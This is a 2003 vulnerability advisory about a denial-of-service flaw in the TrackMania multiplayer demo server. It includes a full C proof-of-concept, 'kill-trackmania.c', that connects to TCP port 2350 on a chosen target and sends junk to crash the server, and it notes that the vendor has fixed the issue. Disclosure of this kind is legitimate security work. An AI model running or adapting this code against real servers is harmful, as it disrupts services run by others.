Overview
TrackMania Demo Denial of Service
Discovered on 2003, November, 30th
Vendor:
TrackMania Official website
TrackMania is a "Stunt Car Racer" like game. The multiplayer demo of this game is subject to denial of service.
Risk
| Exploit easiness |
 |
| Vulnerability spreading |
 |
| Impact |
|
| Risk |
|
Details
The multiplayer game use TCP port 2350 to communicate. If you send some garbage to this port, it will shutdown the game server.
Exploit
Here is the proof of concept :
/*
* [kill-trackmania.c]
* A remote DoS that affects the Trackmania game server
*
* by Scrap
* webmaster@securiteinfo.com
* https://www.securiteinfo.com
*
* gcc kill-trackmania.c -o kill-trackmania -O2
*
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
char buffer[1024];
unsigned long counter;
printf("\n [kill-trackmania.c] by Scrap / Securiteinfo.com\n");
if (argc<2)
{
printf("Usage: %s target\n\n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(2350);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
exit(0);
}
printf("\n\t Sending Bomb... \n");
send(sock, "Bomb from Securiteinfo.com\n\n",17,0);
close(sock);
printf("\t Bomb sent...\n");
}
Download
kill-trackmania.c.
Solution
The vendor has been informed and has solved the problem.
Discovered by
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
Tags
DÉNIS DE SERVICE
JEU EN LIGNE
Inscription à notre lettre d'information
Inscrivez-vous à notre
lettre d'information pour vous tenir au courant de nos actualités et de nos dernières trouvailles.
